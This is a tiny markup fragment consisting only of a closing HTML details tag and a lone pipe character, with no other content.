</details>
|